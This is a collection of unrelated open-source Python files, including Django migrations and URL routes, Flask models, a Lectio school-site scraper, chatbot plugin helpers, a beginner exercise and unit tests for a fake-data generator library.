print("The solution took %.4f seconds to compute." % (done - start)) | CianciuStyles/project-euler | 011.py | Python | mit | 1,763 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='TrackedPosition',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
('time', models.DateTimeField()),
('latitude', models.FloatField()),
('longitude', models.FloatField()),
('altitude', models.FloatField()),
('accuracy', models.FloatField()),
],
options={
'ordering': ['id'],
},
bases=(models.Model,),
),
migrations.CreateModel(
name='TrackingKey',
fields=[
('key', models.CharField(max_length=32, primary_key=True, serialize=False)),
('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='TrackingSession',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
('start_time', models.DateTimeField()),
('end_time', models.DateTimeField(null=True, blank=True)),
('active', models.BooleanField(default=True)),
('viewkey', models.CharField(max_length=32)),
('is_cleaned', models.BooleanField(default=False)),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='trackedposition',
name='session',
field=models.ForeignKey(to='tracker.TrackingSession'),
preserve_default=True,
),
]
| nyrocron/tracking-server | tracker/migrations/0001_initial.py | Python | mit | 2,159 |
# -*- coding: utf-8 -*-
from django.conf.urls import url
from dictionaries.items.views import DicItemsListView, DicItemsCreateView, \
DicItemsDetailView, DicItemsUpdateView, DicItemsDeleteView
urlpatterns = [
url(r'^$', DicItemsListView.as_view(), name='items-list'),
url(r'^add/$', DicItemsCreateView.as_view(), name='items-add'),
url(r'^(?P<dictionary_id>[0-9]+)/$', DicItemsDetailView.as_view(), name='items-detail'),
url(r'^(?P<dictionary_id>[0-9]+)/edit/$', DicItemsUpdateView.as_view(), name='items-edit'),
url(r'^(?P<dictionary_id>[0-9]+)/delete/$', DicItemsDeleteView.as_view(), name='items-delete'),
]
| mitrofun/kids2 | src/apps/dictionaries/items/urls.py | Python | mit | 637 |
from flask_sqlalchemy import SQLAlchemy
from . import db
class Role(db.Model):
__tablename__='roles'
id=db.Column(db.Integer,primary_key=True)
name=db.Column(db.String(64),unique=True)
users=db.relationship('User',backref='role')
def __repr__(self):
return '<Role>{}</Role>'.format(self.name)
class User(db.Model):
__tablename__='users'
id=db.Column(db.Integer,primary_key=True)
role_id=db.Column(db.Integer,db.ForeignKey('roles.id'))
username=db.Column(db.String(64),unique=True,index=True)
def __repr__(self):
return '<Username>{}</Username>'.format(self.username)
| zhangmingkai4315/Flask-Web-App | app/models.py | Python | mit | 628 |
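# Editor's note: a minimal usage sketch (not part of the original module). It
# assumes `db` is the Flask-SQLAlchemy instance imported above, that the tables
# exist, and that it runs inside an active application context (e.g. flask shell).
#
#     admin = Role(name='admin')
#     user = User(username='alice', role=admin)   # 'role' is provided by the backref
#     db.session.add_all([admin, user])
#     db.session.commit()
#     admin.users   # -> [<Username>alice</Username>]
#     user.role     # -> <Role>admin</Role>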
SCHEDULE_NONE = None
SCHEDULE_HOURLY = '0 * * * *'
SCHEDULE_DAILY = '0 0 * * *'
SCHEDULE_WEEKLY = '0 0 * * 0'
SCHEDULE_MONTHLY = '0 0 1 * *'
SCHEDULE_YEARLY = '0 0 1 1 *'
| frictionlessdata/datapackage-pipelines | datapackage_pipelines/generators/schedules.py | Python | mit | 171 |
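# Editor's note (not part of the original module): these are standard five-field
# cron expressions, read left to right as minute, hour, day-of-month, month, and
# day-of-week. For example, SCHEDULE_WEEKLY = '0 0 * * 0' means minute 0, hour 0,
# any day of the month, any month, day-of-week 0 (Sunday), i.e. midnight every
# Sunday.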
from django.conf.urls import patterns, include, url
from django.contrib import admin
import urls
from apps.blog import views
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'gigsblog.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
# url(r'^admin/', include(admin.site.urls)),
url(r'^$', views.Index.as_view(), name='index'),
url(r'^signup', views.SignUp.as_view(), name='signUp'),
url(r'^login', views.Login.as_view(), name='login'),
url(r'^logout', 'django.contrib.auth.views.logout',{'next_page':'/'}, name='logout'),
url(r'^post/', include('urls.blog', namespace='post')),
url(r'^admin/', include('urls.admin')),
)
| gusaul/gigsblog | urls/main.py | Python | mit | 683 |
#!/usr/bin/python
# -*- coding: utf8 -*-
from bs4 import BeautifulSoup as Soup
import urls
import re
import proxy
from datetime import *
import time
from time import mktime
import functions
def materials ( config ):
url = "https://www.lectio.dk/lectio/%s/MaterialOverview.aspx?holdelement_id=%s" % ( str(config["school_id"]), str(config["team_element_id"]) )
cookies = {}
# Insert User-agent headers and the cookie information
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1665.2 Safari/537.36",
"Content-Type" : "application/x-www-form-urlencoded",
"Host" : "www.lectio.dk",
"Origin" : "https://www.lectio.dk",
"Cookie" : functions.implode(cookies, "{{index}}={{value}}", "; ")
}
response = proxy.session.get(url, headers=headers)
html = response.text
soup = Soup(html)
if soup.find("table", attrs={"id" : "m_Content_MaterialsStudents"}) is None:
return {
"status" : False,
"error" : "Data not found"
}
rows = soup.find("table", attrs={"id" : "m_Content_MaterialsStudents"}).findAll("tr")
materialsList = []
if len(rows) > 1:
rows.pop(0)
titleProg = re.compile(ur"(?P<authors>.*): (?P<title>.*), (?P<publisher>.*)")
for row in rows:
elements = row.findAll("td")
title = unicode(elements[0].text.replace("\n", ""))
titleGroups = titleProg.match(title)
materialsList.append({
"title_text" : title,
"title" : titleGroups.group("title") if not titleGroups is None else title,
"publisher" : titleGroups.group("publisher") if not titleGroups is None else "",
"authors" : titleGroups.group("authors").split(", ") if not titleGroups is None else "",
"type" : "book" if unicode(elements[1].text.replace("\n", "")) == u"Bog" else unicode(elements[1].text.replace("\n", "")),
"book_storage" : True if elements[2].text.replace("\n", "") == "Ja" else False,
"comment" : unicode(elements[3].text.strip("\n").replace("\n", "")),
"ebook" : elements[4].text.strip("\n").replace("\n", "")
})
return {
"status" : "ok",
"materials" : materialsList
} | boh1996/LectioAPI | scrapers/materials.py | Python | mit | 2,102 |
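# Editor's note: a minimal usage sketch (not part of the original scraper). The
# config keys are the ones read by materials() above; it assumes the repository's
# proxy and functions modules are importable and that proxy.session already holds
# an authenticated Lectio session. The ids below are placeholders.
#
#     config = {
#         "school_id": 123,
#         "team_element_id": 456,
#     }
#     result = materials(config)
#     if result["status"] == "ok":
#         for m in result["materials"]:
#             print m["title"], m["type"], m["book_storage"]
#     else:
#         print result["error"]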
#!/usr/bin/env python
# Copyright (c) 2011-2015 SEOmoz, Moz
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
name='mozscape',
version='0.1.1',
description='Mozscape API Bindings for Python',
author_email='[email protected]',
url='http://github.com/seomoz/SEOmozAPISamples',
py_modules=['mozscape'],
license='MIT',
platforms='Posix; MacOS X',
classifiers=[
'License :: OSI Approved :: MIT License',
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Topic :: Internet :: WWW/HTTP'],
)
| seomoz/SEOmozAPISamples | python/setup.py | Python | mit | 1,723 |
import json
import datetime
import threading
from base_plugin import *
import base_plugin
#=============================================Messaging===================================
def send_message(recipient, message, mtype='chat'):
'''
Send a message to recipient.
:param recipient: The To field of your message.
:param message: the message string to send.
:para mtype: The message type to send, supports public/private and xmpp style chat/groupchat.
'''
if mtype == 'private':
mtype = 'chat'
if mtype == 'public':
mtype = 'groupchat'
base_plugin.PluginContext.client.send_message(mto=recipient, mbody=message, mtype=mtype)
#=============================================FILTERS=====================================
#FIXME: assumes the event exposes From_Nick/Body like a message event.
def self_message(event, plugin):
    '''
    filter for self generated events.
    :param event: the event being filtered
    :param plugin: the plugin hosting the filter
    returns - true if not self generated event, false otherwise.
    '''
    if event.From_Nick != plugin.client.nick and plugin.client.nick in event.Body:
        return True
    return False
def on_message(event, plugin):
'''
filter for group chat events.
:param event: the event being filtered
:param plugin: the plugin hosting the filter
returns - true if a group chat event, false otherwise.
'''
if event.Type in ["groupchat"]:
return True
return False
def on_private_message(event, plugin):
'''
filter for private message events.
:param event: the event being filtered
:param plugin: the plugin hosting the filter
returns - true if a private message event, false otherwise.
'''
if not event.Room:
return True
return False
def on_presence(event, plugin):
'''
filter for join/part type events.
:param event: the event being filtered
:param plugin: the plugin hosting the filter
returns - true if a presence event, false otherwise.
'''
if event.Type in ["available", "unavailable"]:
return True
return False
#=============================================FILE OPERATORS=====================================
def put_object_to_file(item, path):
'''
Syntactic sugar, write jsonified object to file.
:param item: Any json-able item.
:param path: path to log file.
'''
with open(path, 'w+') as f:
f.write(json.dumps(item))
def get_object_from_file(path):
'''
Syntactic sugar, read jsonified object from file.
:param path: path to log file where item is stored.
Returns - json expanded item from log file.
'''
with open(path, 'r') as f:
item_str = f.read()
return json.loads(item_str)
def append_to_file(string, path):
'''
Syntactic sugar, append string to file.
:param item: Any json-able item.
:param path: path to log file.
'''
with open(path, 'a') as f:
f.write(string)
def write_to_file(string, path):
'''
Syntactic sugar, write string to file.
:param item: Any json-able item.
:param path: path to log file.
'''
with open(path, 'w+') as f:
f.write(string)
def read_from_file(path):
'''
Syntactic sugar, read from file.
:param path: path to log file where item is stored.
Returns - string contents of log file.
'''
with open(path, 'r') as f:
return f.read()
def read_lines_from_file(path):
'''
Read lines from file, as seperated by newline/enter.
:param path: path to log file
Returns - list of lines
'''
return read_from_file(path).split('\n')
#===========================================TIMED EVENTS=====================================
def schedule_event_by_delay(delay, event, args=[]):
'''
Schedule an event by a delay in seconds.
:param delay: number of seconds until event triggers.
:param event: the action to be triggered.
:param args: the arguments to pass when the event is called. (default [])
'''
threading.Timer(delay, call_function_with_variable_arguments, [event, args]).start()
def schedule_event(time, event, args=[]):
'''
Schedule an event by an absolute time
:param time: the datetime object representing the trigger time.
:param event: the action to be triggered.
:param args: the arguments to pass when the event is called. (default [])
'''
delta = time - datetime.datetime.now()
threading.Timer(delta.total_seconds(), call_function_with_variable_arguments, [event, args]).start()
def schedule_event_from_parts(year, month, day, hour, minute, second, event, args=[]):
    '''
    Schedule an event by an absolute time given as date/time components.
    (Distinct name so it does not shadow the datetime-based schedule_event above.)
    :param year: year of the event
    :param month: month of the event
    :param day: day of the event
    :param hour: hour of the event
    :param minute: minute of the event
    :param second: second of the event
    :param event: the action to be triggered.
    :param args: the arguments to pass when the event is called. (default [])
    '''
    time = datetime.datetime(year, month, day, hour, minute, second)
    delta = time - datetime.datetime.now()
    threading.Timer(delta.total_seconds(), call_function_with_variable_arguments, [event, args]).start()
#==========================================HERE THERE BE DRAGONS=================================================
def call_function_with_variable_arguments(function, arguments):
    '''
    Takes functions, takes arguments, makes it fit.
    :param function: The function to call
    :param arguments: The argument list to make fit.
    '''
    iterator = len(arguments)
    real_exception = None
    while True:
        try:
            function(*(arguments[:iterator]))
            return
        except Exception as e:
            # Keep the first exception seen, and let any error that is not an
            # argument-count mismatch take precedence over one that is.
            if not real_exception or "takes exactly" not in str(e) or "arguments" not in str(e):
                real_exception = e
        iterator -= 1
        if iterator < 0:
            raise real_exception
| Gehn/JustAChatBot | plugin_utils.py | Python | mit | 5,651 |
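# Editor's note: a minimal usage sketch (not part of the original module). It
# assumes plugin_utils and its base_plugin dependency are importable and that the
# plugin framework has already set base_plugin.PluginContext.client before
# send_message runs; the recipient and path below are placeholders.
#
#     import plugin_utils
#
#     # persist and reload a small state dict
#     plugin_utils.put_object_to_file({"greeted": ["alice"]}, "/tmp/state.json")
#     state = plugin_utils.get_object_from_file("/tmp/state.json")
#
#     # send a reminder to a room 60 seconds from now
#     plugin_utils.schedule_event_by_delay(
#         60, plugin_utils.send_message,
#         ["[email protected]", "Stand-up time!", "public"])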
def cheese_and_crackers(cheese_count,boxes_of_crackers):
print "You have %d cheeses!" % cheese_count
print "You have %d boxes of crackers!" % boxes_of_crackers
print "Man that's enough for a party!"
print "Get a blanket.\n"
print "We can just give the function numbers directly:"
cheese_and_crackers(20,30)
print "OR, we can use variables from our script:"
amount_of_cheese = 10
amount_of_crackers = 50
cheese_and_crackers(amount_of_cheese,amount_of_crackers)
print "We can even do math inside too."
cheese_and_crackers(10+20,5+6)
print "And we can combine the two,variables and math:"
cheese_and_crackers(amount_of_cheese+100,amount_of_crackers+1000)
| BeeBubble/SnakeRace | LPTHW/ex019.py | Python | mit | 673 |
from babymaker import BabyMaker, EnumType, IntType, StringType, UUIDType, FieldType, DatetimeType, FloatType, EmbedType
import unittest
import string
import sys
from datetime import datetime, timedelta
class TestMakeSomeBabies(unittest.TestCase):
def test_make_one(self):
fields = {
"id": UUIDType()
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
self.assertTrue("id" in one)
def test_make_some(self):
fields = {
"id": UUIDType()
}
female_of_the_species = BabyMaker(fields)
some = list(female_of_the_species.make_some(8))
self.assertEquals(len(some), 8)
for one in some:
self.assertTrue("id" in one)
def test_uuid_field_hex_format(self):
fields = {
"id": UUIDType(format="hex_str")
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertEquals(len(the_id), 32)
for char in the_id:
self.assertTrue(char in string.hexdigits)
def test_uuid_field_default_format(self):
fields = {
"id": UUIDType()
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertEquals(len(the_id), 36)
for char in the_id:
self.assertTrue(char in string.hexdigits + "-")
def test_uuid_field_int_format(self):
fields = {
"id": UUIDType("int")
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertIsInstance(the_id, int)
def test_uuid_field_int_str_format(self):
fields = {
"id": UUIDType("int_str")
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
for char in the_id:
self.assertTrue(char in string.digits)
will_it_blend = int(the_id)
def test_int_field(self):
fields = {
"id": IntType(min_value=10, max_value=11)
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertIsInstance(the_id, int)
self.assertTrue(the_id >= 10)
self.assertTrue(the_id <= 11)
fields = {
"id": IntType()
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertIsInstance(the_id, int)
self.assertTrue(the_id >= 0)
self.assertTrue(the_id <= sys.maxsize)
def test_float_field(self):
fields = {
"id": FloatType(min_value=2.0, max_value=10.0)
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertIsInstance(the_id, float)
self.assertTrue(the_id >= 2.0)
self.assertTrue(the_id <= 10.0)
fields = {
"id": FloatType()
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertIsInstance(the_id, float)
self.assertTrue(the_id >= 0.0)
self.assertTrue(the_id <= 1.0)
for baby in female_of_the_species.make_some(100):
the_id = baby.get("id")
self.assertIsInstance(the_id, float)
self.assertTrue(the_id >= 0.0)
self.assertTrue(the_id <= 1.0)
fields = {
"id": FloatType(min_value=1.0)
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertIsInstance(the_id, float)
self.assertTrue(the_id >= 1.0)
self.assertTrue(the_id <= 2.0)
def test_string_field(self):
fields = {
"id": StringType(min_size=10, max_size=22)
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertIsInstance(the_id, str)
for char in the_id:
self.assertTrue(char in string.printable)
self.assertTrue(len(the_id) >= 10)
self.assertTrue(len(the_id) <= 22)
fields = {
"id": StringType()
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertIsInstance(the_id, str)
for char in the_id:
self.assertTrue(char in string.printable)
self.assertTrue(len(the_id) >= 0)
self.assertTrue(len(the_id) <= 64)
def test_string_field_with_limited_chars(self):
allowed_chars = "paul"
fields = {
"id": StringType(allowed_chars=allowed_chars, min_size=10, max_size=22)
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertIsInstance(the_id, str)
for char in the_id:
self.assertTrue(char in allowed_chars)
self.assertTrue(len(the_id) >= 10)
self.assertTrue(len(the_id) <= 22)
def test_enum_type(self):
choices = [1, 8, "paul", 12, None]
fields = {
"id": EnumType(choices=choices)
}
female_of_the_species = BabyMaker(fields)
some = list(female_of_the_species.make_some(88))
self.assertEquals(len(some), 88)
for one in some:
the_id = one.get("id")
self.assertTrue(the_id in choices)
def test_base_field_type(self):
fields = {
"id": FieldType()
}
female_of_the_species = BabyMaker(fields)
some = list(female_of_the_species.make_some(88))
self.assertEquals(len(some), 88)
for one in some:
the_id = one.get("id")
self.assertIsNone(the_id)
def test_datetime_type(self):
start = datetime(1976, 7, 15)
end = datetime(1977, 7, 15)
fields = {
"created": DatetimeType(start, end)
}
female_of_the_species = BabyMaker(fields)
some = list(female_of_the_species.make_some(88))
self.assertEquals(len(some), 88)
for one in some:
created = one.get("created")
self.assertIsInstance(created, datetime)
self.assertTrue(created <= end)
self.assertTrue(created >= start)
def test_datetime_notime_type(self):
start = datetime(1976, 7, 15)
end = datetime(1977, 7, 15)
fields = {
"created": DatetimeType(start, end, include_time=False)
}
female_of_the_species = BabyMaker(fields)
some = list(female_of_the_species.make_some(88))
self.assertEquals(len(some), 88)
for one in some:
created = one.get("created")
self.assertIsInstance(created, datetime)
self.assertEquals(created.hour, 0)
self.assertEquals(created.minute, 0)
self.assertEquals(created.second, 0)
self.assertTrue(created <= end)
self.assertTrue(created >= start)
def test_datetime_incremental_type(self):
start = datetime(1976, 7, 15)
end = datetime(1977, 7, 15)
delta = timedelta(weeks=1)
fields = {
"created": DatetimeType(start, end, increment=delta)
}
female_of_the_species = BabyMaker(fields)
some = list(female_of_the_species.make_some(56))
self.assertEquals(len(some), 56)
test_value = start
for one in some:
created = one.get("created")
self.assertIsInstance(created, datetime)
self.assertTrue(created <= end)
self.assertTrue(created >= start)
self.assertEquals(created, test_value)
test_value += delta
if test_value >= end:
test_value = start
def test_datetime_decremental_type(self):
start = datetime(1976, 7, 15)
end = datetime(1977, 7, 15)
delta = timedelta(weeks=-1)
fields = {
"created": DatetimeType(start, end, increment=delta)
}
female_of_the_species = BabyMaker(fields)
some = list(female_of_the_species.make_some(56))
self.assertEquals(len(some), 56)
test_value = end
for one in some:
created = one.get("created")
self.assertIsInstance(created, datetime)
self.assertTrue(created <= end)
self.assertTrue(created >= start)
self.assertEquals(created, test_value)
test_value += delta
if test_value <= start:
test_value = end
def test_embedded_maker(self):
fields = {
"id": UUIDType()
}
female_of_the_species = BabyMaker(fields)
fields2 = {
"inbed": EmbedType(female_of_the_species),
"id": UUIDType()
}
grandma = BabyMaker(fields2)
one = grandma.make_one()
self.assertTrue("id" in one)
self.assertTrue("inbed" in one)
self.assertTrue("id" in one.inbed)
| bvalerius/py-babymaker | tests/test_babymaker.py | Python | mit | 9,457 |
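# Editor's note: a small usage sketch distilled from the tests above; it is not
# part of the original test module and assumes the babymaker package from this
# repository is installed. Field names and bounds are arbitrary examples.
from babymaker import BabyMaker, IntType, StringType, UUIDType

maker = BabyMaker({
    "id": UUIDType(format="hex_str"),             # 32-char hex string, as tested above
    "age": IntType(min_value=0, max_value=120),
    "name": StringType(min_size=3, max_size=12),
})

one = maker.make_one()                  # a single record; fields readable via .get()
print(one.get("id"))

for record in maker.make_some(5):       # make_some() is iterable (the tests wrap it in list())
    print(record.get("name"))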